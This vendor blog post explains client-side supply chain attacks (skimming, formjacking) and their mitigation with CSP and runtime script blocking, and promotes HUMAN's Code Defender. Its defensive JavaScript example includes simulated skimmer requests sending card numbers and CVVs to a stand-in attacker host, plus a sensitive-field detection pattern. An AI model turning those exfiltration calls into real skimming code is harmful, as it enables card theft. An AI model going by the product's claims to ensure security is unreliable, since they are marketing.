HUMAN Blog

How to Mitigate Client-side Supply Chain Threats

Written by HUMAN | April 20, 2022

When users create or log into an account, complete a transaction or submit a form of any kind, they are trusting you with their sensitive personal data. If your site collects credentials, credit card numbers and other personally identifiable information (PII), you are taking responsibility for protecting a piece of your users’ identity. But did you know that using client-side code from third-party libraries can put you at risk of a data breach and potentially make you noncompliant with data privacy regulations?

Third-party Code Leaves You Vulnerable

Writing code takes time and developer resources, and why reinvent the wheel? Third-party code libraries provide out-of-the-box, client-side scripts that enable common functionality such as social sharing buttons, advertising, payment iframes, chatbots and tracking scripts. Even better, these scripts run in users’ browsers rather than on your web server, offloading work from your infrastructure and (when the script is well behaved) improving user experience. It’s no wonder that 70% of the code on an average website is sourced from third parties, and most of it is JavaScript. A recent survey found that almost 65% of developers have done extensive development work in JavaScript code.

There’s just one problem. Like any code, JavaScript can contain vulnerabilities that open the door to a cyberattack, and a third-party script is usually fetched from the vendor’s server on every page load, so a compromise of that vendor (or of any nth-party script it loads in turn) reaches your users immediately, with no change to your own codebase. Because the script runs on the client side, website owners have limited visibility into how it is behaving in users’ browsers. Code reviews and scans of your repository never see scripts that are loaded dynamically at runtime, and a script that is clean today can be swapped for a malicious one tomorrow. This is far from ideal for website owners looking to prevent supply chain attacks and adhere to compliance regulations.

The Risk of Client-side JavaScript

In order for third-party JavaScript to work, it needs access to your site, apps and data. The browser’s same-origin policy does not distinguish scripts by where they were loaded from: a script tag pointing at a vendor’s CDN runs with exactly the same privileges as your own first-party code. That means it can read and modify page elements (including form fields as the user types into them), overwrite built-in object prototypes, read cookies and local or session storage, and send network requests to any destination the browser permits.

JavaScript has a lot of power. And cybercriminals know it. They compromise these client-side scripts at their source, or exploit vulnerabilities to inject their own, so that malicious code runs in every visitor’s browser: a supply chain attack. Here are two common types:

  • Digital Skimming and Magecart Attacks: Cybercriminals inject malicious JavaScript code that skims payment card data from checkout pages and sends it to a server they control. They can sell this information on the dark web or use it to make fraudulent purchases.
  • Formjacking: Attackers hijack login and checkout forms with injected scripts that intercept form submissions, allowing them to collect personal information such as Social Security numbers, usernames, passwords, PINs and addresses whenever users submit a form. This is also called PII harvesting. They sell the stolen data on the dark web or use it in account takeover attacks.

Real-world examples of client-side supply chain attacks include the recent attack on Segway that exposed the credit card data of its global users, and the infamous 2018 attack on British Airways, for which the UK Information Commissioner’s Office initially proposed a fine of £183.39 million (approximately $229 million). The fine was ultimately lowered to £20 million, or $26.13 million: a relative victory, but still a huge financial loss that could have been avoided.

If your business suffers a client-side supply chain attack, the negative impact can be devastating. This includes regulatory fines, lawsuits, damage to brand reputation, loss of consumer trust, impaired site functionality and lower stock value.

How to Manage Client-side Threats

Client-side JavaScript provides significant advantages to the websites that use it; you just have to be aware of the risk and have a process for mitigating it. Here’s how:

  • Get real-time visibility into your client-side code - Maintain a complete view of the first-, third- and nth-party client-side scripts running in your environment.
  • Analyze client-side code - Evaluate how scripts are interacting with your website, what additional scripts they are interacting with and if they are accessing sensitive information.
  • Identify high-risk incidents - Determine which incidents involving PII, cardholder (PCI) data or known-vulnerable scripts response teams should prioritize. Actions such as HTTP requests to a domain never seen before can signal that an investigation is warranted.
  • Get 360-degree contextual details - Drill into specific incidents to gather additional information, including when it happened, what actions were taken, the domains involved and how many users were impacted.
  • Mitigate the threat - Use a combination of content security policy (CSP) and granular browser-based JavaScript blocking to stop risky scripts from accessing data.
  • Continuously optimize - Analyze data to see incident trends week over week and track the reduction of PCI and compliance exposures, so you can optimize your future responses.


Enable Comprehensive Mitigation

Mitigating client-side supply chain threats requires a comprehensive approach. This includes enabling CSP and browser-based JavaScript blocking.

CSP limits the threat of cross-site scripting (XSS) attacks by having the browser enforce a policy, delivered in a response header, that restricts which scripts and other resources it may load for a given page. For example, the script-src directive allowlists the origins from which external scripts may be loaded; inline scripts are permitted only if they carry a nonce or hash listed in the policy (or through the 'unsafe-inline' keyword, which gives up most of the protection). Roll a new policy out in Content-Security-Policy-Report-Only mode with a report-uri or report-to endpoint before enforcing it, since an over-strict policy breaks the very payment and analytics scripts it is meant to protect. Unfortunately, CSP is all or nothing: it decides per script source, at load time, whether a script runs. It can thwart an injection from an unauthorized domain outright, but it must stop the whole script, it cannot restrict what an allowed script does once it is running, and it offers no defense when a script the policy already trusts is compromised at its source, which is exactly the supply chain scenario.

This is where browser-based JavaScript blocking comes in. This capability provides granular control over legitimate JavaScript code at runtime, so you can block specific actions (a script reading a particular form field, or sending data to an unexpected domain) without disabling the entire script. Security teams can allow JavaScript to collect information from approved data fields while simultaneously blocking access to sensitive PII and PCI data fields, like credit card numbers and Social Security numbers. This allows you to retain functionality and enforce compliance with PCI DSS and other privacy regulations.
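As an added example that is not part of the original post and not the Code Defender implementation, the following JavaScript models both layers described above: a simplified version of the browser’s CSP script-src decision (per source, at load time) and a runtime guard that hooks the network APIs a skimmer would use (fetch and navigator.sendBeacon) and blocks requests that carry sensitive field names to hosts outside an allowlist. Every hostname, the nonce value and the list of sensitive field names are assumptions chosen for the example.

```javascript
// Added example, not HUMAN's code. Two controls against client-side skimming:
// (1) a model of the browser's CSP script-src decision, made once per script
//     source at load time, and (2) a runtime guard that hooks network APIs and
//     blocks exfiltration of sensitive fields to hosts outside an allowlist.
// All hostnames, the nonce and the field-name pattern are assumptions.

// ---- (1) CSP: per-source, load-time ---------------------------------------
function parseScriptSrc(cspHeader) {
  for (const directive of cspHeader.split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name === 'script-src') return sources;
  }
  return []; // no script-src: a real browser would fall back to default-src
}

// True if the browser would execute the script. Pass `src` for an external
// <script src>; omit it for an inline script and pass its `nonce` instead.
// Simplified matcher: host entries must equal the script's origin exactly
// (real CSP also supports wildcards, scheme-only and path-qualified sources).
function cspAllowsScript(cspHeader, { src, nonce } = {}, pageOrigin) {
  const sources = parseScriptSrc(cspHeader);
  if (!src) {
    // Inline scripts are never allowed by a host entry: only by a matching
    // nonce/hash or the (weak) 'unsafe-inline' keyword.
    return sources.includes("'unsafe-inline'") ||
      (nonce !== undefined && sources.includes(`'nonce-${nonce}'`));
  }
  const origin = new URL(src).origin;
  return sources.some((s) =>
    s === "'self'" ? origin === pageOrigin : !s.startsWith("'") && s === origin);
}

// ---- (2) Runtime guard: per-action, when data is about to leave the page --
const SENSITIVE = /^(card_?(number|num)?|cc_?(number|num)?|pan|cvv2?|cvc|ssn|password|passwd)$/i;

// Collect parameter names from the URL query string plus a body given as JSON
// text, a urlencoded string, URLSearchParams/FormData, or a plain object.
// Opaque bodies (Blob, ArrayBuffer) are not inspected by this example.
function fieldNames(url, body) {
  const names = [...url.searchParams.keys()];
  const walk = (v) => {
    if (v && typeof v === 'object') {
      for (const [k, child] of Object.entries(v)) { names.push(k); walk(child); }
    }
  };
  if (typeof body === 'string') {
    try { walk(JSON.parse(body)); }
    catch { names.push(...new URLSearchParams(body).keys()); }
  } else if (body && typeof body.keys === 'function') {
    names.push(...body.keys());
  } else {
    walk(body);
  }
  return names;
}

function createExfilGuard({ pageOrigin, allowedHosts, onEvent }) {
  // Verdict for one outbound request: allowed hosts pass untouched, a new
  // host is logged, and a new host receiving sensitive field names is blocked.
  function decide(rawUrl, body) {
    const url = new URL(rawUrl, pageOrigin); // resolves relative URLs
    if (allowedHosts.has(url.host)) return { allowed: true };
    const fields = fieldNames(url, body).filter((k) => SENSITIVE.test(k));
    const verdict = fields.length === 0
      ? { allowed: true, flag: 'new-domain' }
      : { allowed: false, fields };
    onEvent({ host: url.host, ...verdict });
    return verdict;
  }
  return {
    decide,
    // Drop-in replacements for window.fetch and navigator.sendBeacon. Install
    // them before any third-party script runs, otherwise a script that saved
    // a reference to the originals can bypass the hooks.
    wrapFetch: (realFetch) => (input, init = {}) => {
      const v = decide(typeof input === 'string' ? input : input.url, init.body);
      return v.allowed ? realFetch(input, init)
                       : Promise.reject(new Error('blocked by exfil guard'));
    },
    wrapSendBeacon: (realSendBeacon) => (url, data) =>
      decide(url, data).allowed ? realSendBeacon(url, data) : false,
  };
}

// ---- Usage with constructed sample traffic (all hosts are assumptions) ----
const CSP = "default-src 'self'; script-src 'self' https://js.payments.example 'nonce-r4nd0m'";
const PAGE = 'https://shop.example';
const events = [];
const guard = createExfilGuard({
  pageOrigin: PAGE,
  allowedHosts: new Set(['shop.example', 'api.payments.example']),
  onEvent: (e) => events.push(e),
});
const sent = [];
const guardedFetch = guard.wrapFetch((url) => { sent.push(String(url)); return Promise.resolve({ ok: true }); });
const beacons = [];
const guardedSendBeacon = guard.wrapSendBeacon((url) => { beacons.push(url); return true; });
guardedFetch('https://api.payments.example/charge', { body: '{"cardNumber":"4111111111111111"}' });
guardedFetch('https://collect.attacker.example/c', { body: 'cardNumber=4111&cvv=123' }).catch(() => {});
guardedSendBeacon('https://collect.attacker.example/b', 'cvv=123');
guardedSendBeacon('https://shop.example/metrics', 'page=checkout');
```

The two layers fail in different ways, which is the point of combining them: the CSP check rejects the injected skimmer from collect.attacker.example before it ever runs, but would happily execute a tampered copy served from the allowlisted payment host, while the runtime guard does not care where the script came from and only asks what it is about to send and to whom. Hooks installed this way run inside the same page as the attacker’s code, so they are a detection and mitigation layer, not a sandbox.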

Reduce Your Risk in Real Time

When it comes to comprehensive mitigation, HUMAN Code Defender has got you covered. This web app security solution provides comprehensive real-time visibility, control and mitigation of client-side threats to your website. By continuously monitoring and analyzing the behavior of all client-side scripts in real users’ browsers, Code Defender identifies script vulnerabilities, detects anomalous script behavior and proactively mitigates risk.

Code Defender inventories and baselines known expected behavior and then applies machine learning models to help identify new malicious, suspicious or anomalous behavior that warrants attention, with appropriate severity levels based on the level of perceived risk to your website. The solution runs 24/7/365 and provides both CSP and granular JavaScript blocking, giving security operations teams real-time visibility and control over client-side risks from first-, third- and nth-party code.

This ensures that your website is secure and compliant, while freeing your development team to focus on innovation. Learn more about Code Defender here.